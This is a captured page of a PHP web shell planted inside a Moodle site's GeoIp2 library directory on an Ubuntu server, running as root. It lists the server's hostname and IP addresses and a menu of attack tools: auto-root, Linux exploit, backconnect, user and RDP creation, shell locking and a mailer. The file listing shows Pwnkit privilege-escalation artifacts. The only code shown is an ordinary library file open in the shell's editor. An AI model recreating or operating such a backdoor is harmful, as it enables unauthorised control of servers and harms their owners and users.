Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
maxmind /
GeoIp2 /
Record /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AbstractPlaceRecord.php
1.2
KB
-rwxrwxrwx
AbstractRecord.php
1.28
KB
-rwxrwxrwx
City.php
1.02
KB
-rwxrwxrwx
Continent.php
1.04
KB
-rwxrwxrwx
Country.php
1.5
KB
-rwxrwxrwx
Location.php
2.06
KB
-rwxrwxrwx
MaxMind.php
400
B
-rwxrwxrwx
Postal.php
836
B
-rwxrwxrwx
RepresentedCountry.php
758
B
-rwxrwxrwx
Subdivision.php
1.45
KB
-rwxrwxrwx
Traits.php
6.03
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractRecord.php
<?php namespace GeoIp2\Record; abstract class AbstractRecord implements \JsonSerializable { private $record; /** * @ignore * * @param mixed $record */ public function __construct($record) { $this->record = isset($record) ? $record : []; } /** * @ignore * * @param mixed $attr */ public function __get($attr) { // XXX - kind of ugly but greatly reduces boilerplate code $key = $this->attributeToKey($attr); if ($this->__isset($attr)) { return $this->record[$key]; } elseif ($this->validAttribute($attr)) { if (preg_match('/^is_/', $key)) { return false; } return null; } throw new \RuntimeException("Unknown attribute: $attr"); } public function __isset($attr) { return $this->validAttribute($attr) && isset($this->record[$this->attributeToKey($attr)]); } private function attributeToKey($attr) { return strtolower(preg_replace('/([A-Z])/', '_\1', $attr)); } private function validAttribute($attr) { return \in_array($attr, $this->validAttributes, true); } public function jsonSerialize() { return $this->record; } }
Close